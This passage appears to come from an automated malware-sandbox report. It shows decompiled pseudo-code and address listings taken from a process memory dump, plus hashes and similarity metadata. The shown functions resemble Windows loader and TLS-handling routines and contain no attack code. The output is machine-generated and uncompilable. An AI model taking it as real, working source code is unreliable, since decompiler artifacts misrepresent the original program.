__eflags = *( *[fs:0x18] + 0xfca) & 0x00001000; if(__eflags != 0) { _t271 = E010C6600(0x11a52d8); __eflags = _t271; if(__eflags == 0) { _t342 = 0; _v169 = _t271; _t374 = E010C7926( *(_t353 + 0x50), 0, &_v169); } } } } if(_t374 < 0) { _v168 = 0; } else { if( *0x11ab239 != 0) { _t342 = *(_t353 + 0x18); E0113E974(_v180, *(_t353 + 0x18), __eflags, _v168, 0, &_v168); } if( *0x11a8472 != 0) { _v192 = 0; _t342 = *0x7ffe0330; _t361 = *0x11ab218; // 0x0 asm("ror edi, cl"); *0x11ab1e0( &_v192, _t353, _v168, 0, _v180); *(_t361 ^ *0x7ffe0330)(); _t269 = _v192; _t353 = _v176; __eflags = _t269; if(__eflags != 0) { _v168 = _t269; } } } } if(_t374 == 0xc0000135 || _t374 == 0xc0000142) { _t366 = 0xc000007a; } _t247 = *(_t353 + 0x50); if(_t247[3] == 0xffffffff) { L40: if(_t366 == 0xc000007a) { __eflags = _t288; if(_t288 == 0) { goto L136; } else { _t366 = 0xc0000139; } goto L54; } } else { _t249 = *_t247; if(( *(_t249 - 0x20) & 0x00000020) != 0) { goto L40; } else { _t250 = _t249 | 0xffffffff; asm("lock xadd [edi+0x9c], eax"); if((_t249 | 0xffffffff) == 0) { E010D2280(_t250, 0x11a84d8); _t342 = *(_t353 + 0x54); _t165 = _t353 + 0x54; // 0x54 _t252 = _t165; __eflags = *(_t342 + 4) - _t252; if( *(_t342 + 4) != _t252) { L135: asm("int 0x29"); L136: _t288 = _v200; _t366 = 0xc0000138; L54: _t342 = _t288; L010F3898(0, _t288, _t366); } else { _t324 = *(_t252 + 4); __eflags = *_t324 - _t252; if( *_t324 != _t252) { goto L135; } else { *_t324 = _t342; *(_t342 + 4) = _t324; _t293 = *(_t353 + 0x50); _v180 = *_t293; E010CFFB0(_t293, _t353, 0x11a84d8); __eflags = *((short*)(_t353 + 0x3a)); if( *((short*)(_t353 + 0x3a)) != 0) { _t342 = 0; __eflags = 0; E010F37F5(_t353, 0); } E010F0413(_t353); _t256 = *(_t353 + 0x48); __eflags = _t256; if(_t256 != 0) { __eflags = _t256 - 0xffffffff; if(_t256 != 0xffffffff) { E010E9B10(_t256); } } __eflags = *(_t353 + 0x28); if( *(_t353 + 0x28) != 0) { _t174 = _t353 + 0x24; // 0x24 E010E02D6(_t174); } L010D77F0( *0x11a7b98, 0, _t353); __eflags = _v180 - _t293; if(__eflags == 0) { E010EC277(_t293, _t366); } _t288 = _v164; goto L40; } } } else { goto L40; } } } } } else { L010CEC7F(_t353); L010E19B8(_t287, 0, _t353, 0); _t200 = E010BF4E3(__eflags); continue; } } L41: if(_v157 != 0) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288); } if(_t366 < 0) { L46: *_v212 = _v168; _t204 = _t366; L47: _pop(_t354); _pop(_t367); _pop(_t289); return E010FB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367); } else { _t206 = *0x11ab2f8; // 0x13f0000 if((_t206 | *0x11ab2fc) == 0 || ( *0x11ab2e4 & 0x00000001) != 0) { goto L46; } else { _t297 = *0x11ab2ec; // 0x100 _v200 = 0; if((_t297 >> 0x00000008 & 0x00000003) == 3) { _t355 = _v168; _t342 = &_v208; _t208 = E01166B68(_v168, &_v208, _v168, __eflags); __eflags = _t208 - 1; if(_t208 == 1) { goto L46; } else { __eflags = _v208 & 0x00000010; if((_v208 & 0x00000010) == 0) { goto L46; } else { _t342 = 4; _t366 = E01166AEB(_t355, 4, &_v216); __eflags = _t366; if(_t366 >= 0) { goto L46; } else { asm("int 0x29"); _t356 = 0; _v44 = 0; _t290 = _v52; __eflags = 0; if(0 == 0) { L108: _t356 = 0; _v44 = 0; goto L63; } else { __eflags = 0; if(0 < 0) { goto L108; } L63: _v112 = _t356; __eflags = _t356; if(_t356 == 0) { L143: _v8 = 0xfffffffe; _t211 = 0xc0000089; } else { _v36 = 0; _v60 = 0; _v48 = 0; _v68 = 0; _v44 = _t290 & 0xfffffffc; E010CE9C0(1, _t290 & 0xfffffffc, 0, 0, &_v68); _t306 = _v68; __eflags = _t306; if(_t306 == 0) { _t216 = 0xc000007b; _v36 = 0xc000007b; _t307 = _v60; } else { __eflags = _t290 & 0x00000001; if(__eflags == 0) { _t349 = *(_t306 + 0x18) & 0x0000ffff; __eflags = _t349 - 0x10b; if(_t349 != 0x10b) { __eflags = _t349 - 0x20b; if(_t349 == 0x20b) { goto L102; } else { _t307 = 0; _v48 = 0; _t216 = 0xc000007b; _v36 = 0xc000007b; goto L71; } } else { L102: _t307 = *(_t306 + 0x50); goto L69; } goto L151; } else { _t239 = L010CEAEA(_t290, _t290, _t356, _t366, __eflags); _t307 = _t239; _v60 = _t307; _v48 = _t307; __eflags = _t307; if(_t307 != 0) { L70: _t216 = _v36; } else { _push(_t239); _push(0x14); _push( &_v144); _push(3); _push(_v44); _push(0xffffffff); _t319 = E010F9730(); _v36 = _t319; __eflags = _t319; if(_t319 < 0) { _t216 = 0xc000001f; _v36 = 0xc000001f; _t307 = _v60; } else { _t307 = _v132; L69: _v48 = _t307; goto L70; } } } } L71: _v72 = _t307; _v84 = _t216; __eflags = _t216 - 0xc000007b; if(_t216 == 0xc000007b) { L150: _v8 = 0xfffffffe; _t211 = 0xc000007b; } else { _t344 = _t290 & 0xfffffffc; _v76 = _t344; __eflags = _v40 - _t344; if(_v40 <= _t344) { goto L150; } else { __eflags = _t307; if(_t307 == 0) { L75: _t217 = 0; _v104 = 0; __eflags = _t366; if(_t366 != 0) { __eflags = _t290 & 0x00000001; if((_t290 & 0x00000001) != 0) { _t217 = 1; _v104 = 1; } _t290 = _v44; _v52 = _t290; } __eflags = _t217 - 1; if(_t217 != 1) { _t369 = 0; _t218 = _v40; goto L91; } else { _v64 = 0; E010CE9C0(1, _t290, 0, 0, &_v64); _t309 = _v64; _v108 = _t309; __eflags = _t309; if(_t309 == 0) { goto L143; } else { _t226 = *(_t309 + 0x18) & 0x0000ffff; __eflags = _t226 - 0x10b; if(_t226 != 0x10b) { __eflags = _t226 - 0x20b; if(_t226 != 0x20b) { goto L143; } else { _t371 = *(_t309 + 0x98); goto L83; } } else { _t371 = *(_t309 + 0x88); L83: __eflags = _t371; if(_t371 != 0) { _v80 = _t371 - _t356 + _t290; _t310 = _v64; _t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff); _t292 = *(_t310 + 6) & 0x0000ffff; _t311 = 0; __eflags = 0; while(1) { _v120 = _t311; _v116 = _t348; __eflags = _t311 - _t292; if(_t311 >= _t292) { goto L143; } _t359 = *((intOrPtr*)(_t348 + 0xc)); __eflags = _t371 - _t359; if(_t371 < _t359) { L98: _t348 = _t348 + 0x28; _t311 = _t311 + 1; continue; } else { __eflags = _t371 - *((intOrPtr*)(_t348 + 0x10)) + _t359; if(_t371 >= *((intOrPtr*)(_t348 + 0x10)) + _t359) { goto L98; } else { __eflags = _t348; if(_t348 == 0) { goto L143; } else { _t218 = _v40; _t312 = *_t218; __eflags = _t312 - *((intOrPtr*)(_t348 + 8)); if(_t312 > *((intOrPtr*)(_t348 + 8))) { _v100 = _t359; _t360 = _v108; _t372 = L010C8F44(_v108, _t312); __eflags = _t372; if(_t372 == 0) { goto L143; } else { _t290 = _v52; _t369 = _v80 + *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E010F3C00(_t360, _t290, *((intOrPtr*)(_t372 + 0xc))); _t307 = _v72; _t344 = _v76; _t218 = _v40; goto L91; } } else { _t290 = _v52; _t307 = _v72; _t344 = _v76; _t369 = _v80; L91: _t358 = _a4; __eflags = _t358; if(_t358 == 0) { L95: _t308 = _a8; __eflags = _t308; if(_t308 != 0) { *_t308 = *((intOrPtr*)(_v40 + 4)); } _v8 = 0xfffffffe; _t211 = _v84; } else { _t370 = *_t218 - _t369 + _t290; *_t358 = _t370; __eflags = _t370 - _t344; if(_t370 <= _t344) { L149: *_t358 = 0; goto L150; } else { __eflags = _t307; if(_t307 == 0) { goto L95; } else { __eflags = _t370 - _t344 + _t307; if(_t370 >= _t344 + _t307) { goto L149; } else { goto L95; } } } } } } } } goto L97; } } goto L143; } } } } else { __eflags = _v40 - _t307 + _t344; if(_v40 >= _t307 + _t344) { goto L150; } else { goto L75; } } } } } L97: *[fs:0x0] = _v20; return _t211; } } } } } else { goto L46; } } } goto L151; } _t288 = _v164; _t366 = 0xc0000135; goto L41; } } } L151: } 0x010cd5f2 0x010cd5f5 0x010cd5f5 0x010cd5fd 0x010cd600 0x010cd60a 0x010cd60d 0x010cd617 0x010cd61d 0x010cd627 0x010cd62e 0x010cd911 0x010cd913 0x00000000 0x010cd919 0x010cd919 0x010cd919 0x010cd634 0x010cd634 0x010cd634 0x010cd634 0x010cd640 0x010cd8bf 0x00000000 0x010cd646 0x010cd646 0x010cd64d 0x010cd652 0x0111b2fc 0x0111b2fc 0x0111b302 0x0111b33b 0x0111b341 0x00000000 0x0111b304 0x0111b304 0x0111b319 0x0111b31e 0x0111b324 0x0111b326 0x0111b332 0x0111b347 0x0111b34c 0x0111b351 0x0111b35a 0x00000000 0x0111b328 0x0111b328 0x00000000 0x0111b328 0x0111b326 0x010cd658 0x010cd658 0x010cd65b 0x010cd665 0x00000000 0x010cd66b 0x010cd66b 0x010cd66b 0x010cd66b 0x010cd66d 0x010cd672 0x010cd67a 0x00000000 0x00000000 0x010cd680 0x010cd686 0x010cd8ce 0x010cd8d4 0x010cd8dd 0x010cd8e0 0x010cd68c 0x010cd691 0x010cd69d 0x010cd6a2 0x010cd6a7 0x010cd6b0 0x010cd6b5 0x010cd6e0 0x010cd6b7 0x010cd6b7 0x010cd6b9 0x010cd6b9 0x010cd6bb 0x010cd6bd 0x010cd6ce 0x010cd6d0 0x010cd6d2 0x0111b363 0x0111b365 0x00000000 0x0111b36b 0x00000000 0x0111b36b 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x010cd6bf 0x010cd6bf 0x010cd6e5 0x010cd6e7 0x010cd6e9 0x010cd6ec 0x010cd6ec 0x010cd6ef 0x010cd6f5 0x010cd6f9 0x010cd6fb 0x010cd6fd 0x010cd701 0x010cd703 0x010cd70a 0x010cd70a 0x010cd701 0x010cd710 0x010cd710 0x010cd6c1 0x010cd6c1 0x010cd6c6 0x0111b36d 0x0111b36f 0x00000000 0x0111b375 0x0111b375 0x0111b375 0x00000000 0x0111b375 0x00000000 0x010cd6cc 0x010cd6d8 0x010cd6d8 0x010cd6d8 0x00000000 0x010cd6c6 0x010cd6bf 0x00000000 0x010cd6da 0x010cd6da 0x010cd716 0x010cd71b 0x010cd720 0x010cd726 0x010cd726 0x010cd72d 0x00000000 0x010cd733 0x010cd739 0x010cd742 0x010cd750 0x010cd758 0x010cd764 0x010cd776 0x010cd77a 0x010cd783 0x010cd928 0x010cd92c 0x010cd93d 0x010cd944 0x010cd94f 0x010cd954 0x010cd956 0x010cd95f 0x010cd961 0x010cd973 0x010cd973 0x010cd956 0x010cd944 0x010cd92c 0x010cd78b 0x0111b394 0x010cd791 0x010cd798 0x0111b3a3 0x0111b3bb 0x0111b3bb 0x010cd7a5 0x010cd866 0x010cd870 0x010cd884 0x010cd892 0x010cd898 0x010cd89e 0x010cd8a0 0x010cd8a6 0x010cd8ac 0x010cd8ae 0x010cd8b4 0x010cd8b4 0x010cd8ae 0x010cd7a5 0x010cd78b 0x010cd7b1 0x0111b3c5 0x0111b3c5 0x010cd7c3 0x010cd7ca 0x010cd7e5 0x010cd7eb 0x010cd8eb 0x010cd8ed 0x00000000 0x010cd8f3 0x010cd8f3 0x010cd8f3 0x00000000 0x010cd8ed 0x010cd7cc 0x010cd7cc 0x010cd7d2 0x00000000 0x010cd7d4 0x010cd7d4 0x010cd7d7 0x010cd7df 0x0111b3d4 0x0111b3d9 0x0111b3dc 0x0111b3dc 0x0111b3df 0x0111b3e2 0x0111b468 0x0111b46d 0x0111b46f 0x0111b46f 0x0111b475 0x010cd8f8 0x010cd8f9 0x010cd8fd 0x0111b3e8 0x0111b3e8 0x0111b3eb 0x0111b3ed 0x00000000 0x0111b3ef 0x0111b3ef 0x0111b3f1 0x0111b3f4 0x0111b3fe 0x0111b404 0x0111b409 0x0111b40e 0x0111b410 0x0111b410 0x0111b414 0x0111b414 0x0111b41b 0x0111b420 0x0111b423 0x0111b425 0x0111b427 0x0111b42a 0x0111b42d 0x0111b42d 0x0111b42a 0x0111b432 0x0111b436 0x0111b438 0x0111b43b 0x0111b43b 0x0111b449 0x0111b44e 0x0111b454 0x0111b458 0x0111b458 0x0111b45d 0x00000000 0x0111b45d 0x0111b3ed 0x00000000 0x00000000 0x00000000 0x010cd7df 0x010cd7d2 0x010cd7ca 0x0111b37c 0x0111b37e 0x0111b385 0x0111b38a 0x00000000 0x0111b38a 0x010cd742 0x010cd7f1 0x010cd7f8 0x0111b49b 0x0111b49b 0x010cd800 0x010cd837 0x010cd843 0x010cd845 0x010cd847 0x010cd84a 0x010cd84b 0x010cd84e 0x010cd857 0x010cd802 0x010cd802 0x010cd80d 0x00000000 0x010cd818 0x010cd818 0x010cd824 0x010cd831 0x0111b4a5 0x0111b4ab 0x0111b4b3 0x0111b4b8 0x0111b4bb 0x00000000 0x0111b4c1 0x0111b4c1 0x0111b4c8 0x00000000 0x0111b4ce 0x0111b4d4 0x0111b4e1 0x0111b4e3 0x0111b4e5 0x00000000 0x0111b4eb 0x0111b4f0 0x0111b4f2 0x010cdac9 0x010cdacc 0x010cdacf 0x010cdad1 0x010cdd78 0x010cdd78 0x010cdcf2 0x00000000 0x010cdad7 0x010cdad9 0x010cdadb 0x00000000 0x00000000 0x010cdae1 0x010cdae1 0x010cdae4 0x010cdae6 0x0111b4f9 0x0111b4f9 0x0111b500 0x010cdaec 0x010cdaec 0x010cdaf5 0x010cdaf8 0x010cdafb 0x010cdb03 0x010cdb11 0x010cdb16 0x010cdb19 0x010cdb1b 0x0111b52c 0x0111b531 0x0111b534 0x010cdb21 0x010cdb21 0x010cdb24 0x010cdcd9 0x010cdce2 0x010cdce5 0x010cdd6a 0x010cdd6d 0x00000000 0x010cdd73 0x0111b51a 0x0111b51c 0x0111b51f 0x0111b524 0x00000000 0x0111b524 0x010cdce7 0x010cdce7 0x010cdce7 0x00000000 0x010cdce7 0x00000000 0x010cdb2a 0x010cdb2c 0x010cdb31 0x010cdb33 0x010cdb36 0x010cdb39 0x010cdb3b 0x010cdb66 0x010cdb66 0x010cdb3d 0x010cdb3d 0x010cdb3e 0x010cdb46 0x010cdb47 0x010cdb49 0x010cdb4c 0x010cdb53 0x010cdb55 0x010cdb58 0x010cdb5a 0x0111b50a 0x0111b50f 0x0111b512 0x010cdb60 0x010cdb60 0x010cdb63 0x010cdb63 0x00000000 0x010cdb63 0x010cdb5a 0x010cdb3b 0x010cdb24 0x010cdb69 0x010cdb69 0x010cdb6c 0x010cdb6f 0x010cdb74 0x0111b557 0x0111b557 0x0111b55e 0x010cdb7a 0x010cdb7c 0x010cdb7f 0x010cdb82 0x010cdb85 0x00000000 0x010cdb8b 0x010cdb8b 0x010cdb8d 0x010cdb9b 0x010cdb9b 0x010cdb9d 0x010cdba0 0x010cdba2 0x010cdba4 0x010cdba7 0x010cdba9 0x010cdbae 0x010cdbae 0x010cdbb1 0x010cdbb4 0x010cdbb4 0x010cdbb7 0x010cdbba 0x010cdcd2 0x010cdcd4 0x00000000 0x010cdbc0 0x010cdbc0 0x010cdbd2 0x010cdbd7 0x010cdbda 0x010cdbdd 0x010cdbdf 0x00000000 0x010cdbe5 0x010cdbe5 0x010cdbee 0x010cdbf1 0x0111b541 0x0111b544 0x00000000 0x0111b546 0x0111b546 0x00000000 0x0111b546 0x010cdbf7 0x010cdbf7 0x010cdbfd 0x010cdbfd 0x010cdbff 0x010cdc0b 0x010cdc15 0x010cdc1b 0x010cdc1d 0x010cdc21 0x010cdc21 0x010cdc23 0x010cdc23 0x010cdc26 0x010cdc29 0x010cdc2b 0x00000000 0x00000000 0x010cdc31 0x010cdc34 0x010cdc36 0x010cdcbf 0x010cdcbf 0x010cdcc2 0x00000000 0x010cdc3c 0x010cdc41 0x010cdc43 0x00000000 0x010cdc45 0x010cdc45 0x010cdc47 0x00000000 0x010cdc4d 0x010cdc4d 0x010cdc50 0x010cdc52 0x010cdc55 0x010cdcfa 0x010cdcfe 0x010cdd08 0x010cdd0a 0x010cdd0c 0x00000000 0x010cdd12 0x010cdd15 0x010cdd2d 0x010cdd2f 0x010cdd32 0x010cdd35 0x00000000 0x010cdd35 0x010cdc5b 0x010cdc5b 0x010cdc5e 0x010cdc61 0x010cdc64 0x010cdc67 0x010cdc67 0x010cdc6a 0x010cdc6c 0x010cdc8e 0x010cdc8e 0x010cdc91 0x010cdc93 0x010cdcce 0x010cdcce 0x010cdc95 0x010cdc9c 0x010cdc6e 0x010cdc72 0x010cdc75 0x010cdc77 0x010cdc79 0x0111b551 0x0111b551 0x00000000 0x010cdc7f 0x010cdc7f 0x010cdc81 0x00000000 0x010cdc83 0x010cdc86 0x010cdc88 0x00000000 0x00000000 0x00000000 0x00000000 0x010cdc88 0x010cdc81 0x010cdc79 0x010cdc6c 0x010cdc55 0x010cdc47 0x010cdc43 0x00000000 0x010cdc36 0x010cdc23 0x00000000 0x010cdbff 0x010cdbf1 0x010cdbdf 0x010cdb8f 0x010cdb92 0x010cdb95 0x00000000 0x00000000 0x00000000 0x00000000 0x010cdb95 0x010cdb8d 0x010cdb85 0x010cdb74 0x010cdc9f 0x010cdca2 0x010cdcb0 0x010cdcb0 0x010cdad1 0x0111b4e5 0x0111b4c8 0x00000000 0x00000000 0x00000000 0x010cd831 0x010cd80d 0x00000000 0x010cd800 0x0111b47f 0x0111b485 0x00000000 0x0111b485 0x010cd665 0x010cd652 0x00000000

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 892299a9356cace3caf97db4c728a4dd36c007c5a11f947b3aaa21b3826aa3f3 Instruction ID: 66dbbe96c38e43b0c819b4e74c073ecbcd0399428d40479bf3421eb6ee8b1bc7 Opcode Fuzzy Hash: 892299a9356cace3caf97db4c728a4dd36c007c5a11f947b3aaa21b3826aa3f3 Instruction Fuzzy Hash: 73E1C130A04356CFEB299F68C884BADBBB2BF45B04F0441FDD98997291D734A985CF91

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%

E010C849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) { void* _t136; signed int _t139; signed int _t141; signed int _t145; intOrPtr _t146; signed int _t149; signed int _t150; signed int _t161; signed int _t163; signed int _t165; signed int _t169; signed int _t171; signed int _t194; signed int _t200; void* _t201; signed int _t204; signed int _t206; signed int _t210; signed int _t214; signed int _t215; signed int _t218; void* _t221; signed int _t224; signed int _t226; intOrPtr _t228; signed int _t232; signed int _t233; signed int _t234; void* _t237; void* _t238; _t236 = __esi; _t235 = __edi; _t193 = __ebx; _push(0x70); _push(0x118f9c0); E0110D0E8(__ebx, __edi, __esi); *((intOrPtr*)(_t237 - 0x5c)) = __ecx; if( *0x11a7b04 == 0) { L4: goto L5; } else { _t136 = E010CCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54); _t236 = 0; if(_t136 < 0) { *((intOrPtr*)(_t237 - 0x54)) = 0; } if( *((intOrPtr*)(_t237 - 0x54)) != 0) { _t193 = *( *[fs:0x30] + 0x18); *(_t237 - 0x48) = *( *[fs:0x30] + 0x18); *(_t237 - 0x68) = _t236; *(_t237 - 0x6c) = _t236; _t235 = _t236; *(_t237 - 0x60) = _t236; E010D2280( *[fs:0x30], 0x11a8550); _t139 = *0x11a7b04; // 0x1 __eflags = _t139 - 1; if(__eflags != 0) { _t200 = 0xc; _t201 = _t237 - 0x40; _t141 = E010EF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20); *(_t237 - 0x44) = _t141; __eflags = _t141; if(_t141 < 0) { L50: E010CFFB0(_t193, _t235, 0x11a8550); L5: return E0110D130(_t193, _t235, _t236); } _push(_t201); _t221 = 0x10; _t202 = *(_t237 - 0x40); _t145 = E010B1C45( *(_t237 - 0x40), _t221); *(_t237 - 0x44) = _t145; __eflags = _t145; if(_t145 < 0) { goto L50; } _t146 = *0x11a7b9c; // 0x0 _t235 = L010D4620(_t202, _t193, _t146 + 0xc0000, *(_t237 - 0x40)); *(_t237 - 0x60) = _t235; __eflags = _t235; if(_t235 == 0) { _t149 = 0xc0000017; *(_t237 - 0x44) = 0xc0000017; } else { _t149 = *(_t237 - 0x44); } __eflags = _t149; if(__eflags >= 0) { L8: *(_t237 - 0x64) = _t235; _t150 = *0x11a7b10; // 0x9 *(_t237 - 0x4c) = _t150; _push(_t237 - 0x74); _push(_t237 - 0x39); _push(_t237 - 0x58); _t193 = E010EA61C(_t193, *((intOrPtr*)(_t237 - 0x54)), *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags); *(_t237 - 0x44) = _t193; __eflags = _t193; if(_t193 < 0) { L30: E010CFFB0(_t193, _t235, 0x11a8550); __eflags = _t235 - _t237 - 0x38; if(_t235 != _t237 - 0x38) { _t235 = *(_t237 - 0x48); L010D77F0( *(_t237 - 0x48), _t236, *(_t237 - 0x48)); } else { _t235 = *(_t237 - 0x48); } __eflags = *(_t237 - 0x6c); if( *(_t237 - 0x6c) != 0) { L010D77F0(_t235, _t236, *(_t237 - 0x6c)); } __eflags = _t193; if(_t193 >= 0) { goto L4; } else { goto L5; } } _t204 = *0x11a7b04; // 0x1 *(_t235 + 8) = _t204; __eflags = *((char*)(_t237 - 0x39)); if( *((char*)(_t237 - 0x39)) != 0) { *(_t235 + 4) = 1; *(_t235 + 0xc) = *(_t237 - 0x4c); _t161 = *0x11a7b10; // 0x9 *(_t237 - 0x4c) = _t161; } else { *(_t235 + 4) = _t236; *(_t235 + 0xc) = *(_t237 - 0x58); } *((intOrPtr*)(_t237 - 0x54)) = E010F37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70); _t224 = _t236; *(_t237 - 0x40) = _t236; *(_t237 - 0x50) = _t236; while(1) { _t163 = *(_t235 + 8); __eflags = _t224 - _t163; if(_t224 >= _t163) { break; } _t228 = *0x11a7b9c; // 0x0 _t214 = L010D4620( *((intOrPtr*)(_t237 - 0x54)) + 1, *(_t237 - 0x48), _t228 + 0xc0000, *(_t237 - 0x70) + *((intOrPtr*)(_t237 - 0x54)) + 1); *(_t237 - 0x78) = _t214; __eflags = _t214; if(_t214 == 0) { L52: _t193 = 0xc0000017; L19: *(_t237 - 0x44) = _t193; L20: _t206 = *(_t237 - 0x40); __eflags = _t206; if(_t206 == 0) { L26: __eflags = _t193; if(_t193 < 0) { E010F37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c); __eflags = *((char*)(_t237 - 0x39)); if( *((char*)(_t237 - 0x39)) != 0) { *0x11a7b10 = *0x11a7b10 - 8; } } else { _t169 = *(_t237 - 0x68); __eflags = _t169; if(_t169 != 0) { *0x11a7b04 = *0x11a7b04 - _t169; } } __eflags = _t193; if(_t193 >= 0) { *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff; } goto L30; } _t226 = _t206 * 0xc; __eflags = _t226; _t194 = *(_t237 - 0x48); do { *(_t237 - 0x40) = _t206 - 1; _t226 = _t226 - 0xc; *(_t237 - 0x4c) = _t226; __eflags = *(_t235 + _t226 + 0x10) & 0x00000002; if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) { __eflags = *(_t235 + _t226 + 0x10) & 0x00000001; if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) { *(_t237 - 0x68) = *(_t237 - 0x68) + 1; _t210 = *(_t226 + *(_t237 - 0x64) + 0x14); __eflags = *((char*)(_t237 - 0x39)); if( *((char*)(_t237 - 0x39)) == 0) { _t171 = _t210; } else { *(_t237 - 0x50) = *(_t210 + *(_t237 - 0x58) * 4); L010D77F0(_t194, _t236, _t210 - 8); _t171 = *(_t237 - 0x50); } L48: L010D77F0(_t194, _t236, *((intOrPtr*)(_t171 - 4))); L46: _t206 = *(_t237 - 0x40); _t226 = *(_t237 - 0x4c); goto L24; } *0x11a7b08 = *0x11a7b08 + 1; goto L24; } _t171 = *(_t226 + *(_t237 - 0x64) + 0x14); __eflags = _t171; if(_t171 != 0) { __eflags = *((char*)(_t237 - 0x39)); if( *((char*)(_t237 - 0x39)) == 0) { goto L48; } E010F57C2(_t171, *((intOrPtr*)(_t235 + _t226 + 0x18))); goto L46; } L24: __eflags = _t206; } while (_t206 != 0); _t193 = *(_t237 - 0x44); goto L26; } _t232 = *(_t237 - 0x70) + 0x00000001 + _t214 & !( *(_t237 - 0x70)); *(_t237 - 0x7c) = _t232; *(_t232 - 4) = _t214; *(_t237 - 4) = _t236; E010FF3E0(_t232, *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)), *((intOrPtr*)(_t237 - 0x54))); _t238 = _t238 + 0xc; *(_t237 - 4) = 0xfffffffe; _t215 = *(_t237 - 0x48); __eflags = _t193; if(_t193 < 0) { L010D77F0(_t215, _t236, *(_t237 - 0x78)); goto L20; } __eflags = *((char*)(_t237 - 0x39)); if( *((char*)(_t237 - 0x39)) != 0) { _t233 = E010EA44B( *(_t237 - 0x4c)); *(_t237 - 0x50) = _t233; __eflags = _t233; if(_t233 == 0) { L010D77F0( *(_t237 - 0x48), _t236, *(_t237 - 0x78)); goto L52; } *(_t233 + *(_t237 - 0x58) * 4) = *(_t237 - 0x7c); L17: _t234 = *(_t237 - 0x40); _t218 = _t234 * 0xc; *(_t218 + *(_t237 - 0x64) + 0x14) = *(_t237 - 0x50); *(_t218 + _t235 + 0x10) = _t236; _t224 = _t234 + 1; *(_t237 - 0x40) = _t224; *(_t237 - 0x50) = _t224; _t193 = *(_t237 - 0x44); continue; } *(_t237 - 0x50) = *(_t237 - 0x7c); goto L17; } *_t235 = _t236; _t165 = 0x10 + _t163 * 0xc; __eflags = _t165; _push(_t165); _push(_t235); _push(0x23); _push(0xffffffff); _t193 = E010F96C0(); goto L19; } else { goto L50; } } _t235 = _t237 - 0x38; *(_t237 - 0x60) = _t235; goto L8; } goto L4; } } 0x010c849b 0x010c849b 0x010c849b 0x010c849b 0x010c849d 0x010c84a2 0x010c84a7 0x010c84b1 0x010c84d8 0x00000000 0x010c84b3 0x010c84c4 0x010c84c9 0x010c84cd 0x010c84cf 0x010c84cf 0x010c84d6 0x010c84e6 0x010c84e9 0x010c84ec 0x010c84ef 0x010c84f2 0x010c84f4 0x010c84fc 0x010c8501 0x010c8506 0x010c8509 0x010c86e0 0x010c86e5 0x010c86e8 0x010c86ed 0x010c86f0 0x010c86f2 0x01119afd 0x01119b02 0x010c84da 0x010c84df 0x010c84df 0x010c86fa 0x010c86fd 0x010c86fe 0x010c8701 0x010c8706 0x010c8709 0x010c870b 0x00000000 0x00000000 0x010c8711 0x010c8725 0x010c8727 0x010c872a 0x010c872c 0x01119af0 0x01119af5 0x010c8732 0x010c8732 0x010c8732 0x010c8735 0x010c8737 0x010c8515 0x010c8515 0x010c8518 0x010c851d 0x010c8523 0x010c8527 0x010c852b 0x010c8537 0x010c8539 0x010c853c 0x010c853e 0x010c868c 0x010c8691 0x010c8699 0x010c869b 0x010c8744 0x010c8748 0x010c86a1 0x010c86a1 0x010c86a1 0x010c86a4 0x010c86a8 0x01119bdf 0x01119bdf 0x010c86ae 0x010c86b0 0x00000000 0x010c86b6 0x00000000 0x01119be9 0x010c86b0 0x010c8544 0x010c854a 0x010c854d 0x010c8551 0x010c876e 0x010c8778 0x010c877b 0x010c8780 0x010c8557 0x010c8557 0x010c855d 0x010c855d 0x010c856b 0x010c856e 0x010c8570 0x010c8573 0x010c8576 0x010c8576 0x010c8579 0x010c857b 0x00000000 0x00000000 0x010c8581 0x010c85a0 0x010c85a2 0x010c85a5 0x010c85a7 0x01119b1b 0x01119b1b 0x010c862e 0x010c862e 0x010c8631 0x010c8631 0x010c8634 0x010c8636 0x010c8669 0x010c8669 0x010c866b 0x01119bbf 0x01119bc4 0x01119bc8 0x01119bce 0x01119bce 0x010c8671 0x010c8671 0x010c8674 0x010c8676 0x01119bae 0x01119bae 0x010c8676 0x010c867c 0x010c867e 0x010c8688 0x010c8688 0x00000000 0x010c867e 0x010c8638 0x010c8638 0x010c863b 0x010c863e 0x010c863f 0x010c8642 0x010c8645 0x010c8648 0x010c864d 0x01119b69 0x01119b6e 0x01119b7b 0x01119b81 0x01119b85 0x01119b89 0x01119ba7 0x01119b8b 0x01119b91 0x01119b9a 0x01119b9f 0x01119b9f 0x010c8788 0x010c878d 0x010c8763 0x010c8763 0x010c8766 0x00000000 0x010c8766 0x01119b70 0x00000000 0x01119b70 0x010c8656 0x010c865a 0x010c865c 0x010c8752 0x010c8756 0x00000000 0x00000000 0x010c875e 0x00000000 0x010c875e 0x010c8662 0x010c8662 0x010c8662 0x010c8666 0x00000000 0x010c8666 0x010c85b7 0x010c85b9 0x010c85bc 0x010c85bf 0x010c85cc 0x010c85d1 0x010c85d4 0x010c85db 0x010c85de 0x010c85e0 0x01119b5f 0x00000000 0x01119b5f 0x010c85e6 0x010c85ea 0x010c86c3 0x010c86c5 0x010c86c8 0x010c86ca 0x01119b16 0x00000000 0x01119b16 0x010c86d6 0x010c85f6 0x010c85f6 0x010c85f9 0x010c8602 0x010c8606 0x010c860a 0x010c860b 0x010c860e 